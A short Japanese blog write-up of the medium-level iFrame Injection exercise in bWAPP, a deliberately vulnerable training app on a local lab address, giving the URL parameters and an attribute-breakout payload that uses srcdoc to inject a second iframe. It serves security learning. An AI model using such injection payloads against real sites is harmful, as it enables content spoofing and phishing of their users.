shikata ga nai

Private? There is no such things.

bWAPPでA1-iFrame Injectionをやってみた(medium)

Hello there, ('ω')ノ

 

今回は、mediumレベルを。

 

f:id:ThisIsOne:20210801192349p:plain

 

まずは、ULRのパラメータとソースコードの関連性を確認して。

 http://192.168.0.50/bWAPP/iframei.php?

 ParamUrl=robots.txt&ParamWidth=250&ParamHeight=250

 

f:id:ThisIsOne:20210801192147p:plain

 

ParamUrl値を変更してもソースコードは変わらず。

他のパラメータは反映されるのですが。

 http://192.168.0.50/bWAPP/iframei.php?

 ParamUrl=aaarobots.txt&ParamWidth=250&ParamHeight=250

 

f:id:ThisIsOne:20210801192738p:plain

 

iframeタグのsrcdoc属性をつかって。

src属性のコンテンツを置き換えることに。

 http://192.168.0.50/bWAPP/iframei.php?

 ParamUrl=robots.txt&ParamWidth=250&ParamHeight=250

 " srcdoc></iframe><iframe src=https://example.com width=200 height=300>"

 

f:id:ThisIsOne:20210801193025p:plain

 

Best regards, (^^ゞ

ひとりひとりの自覚をもった行動で、医療従事者と保健所職員を助けよう。

f:id:ThisIsOne:20200404115457p:plain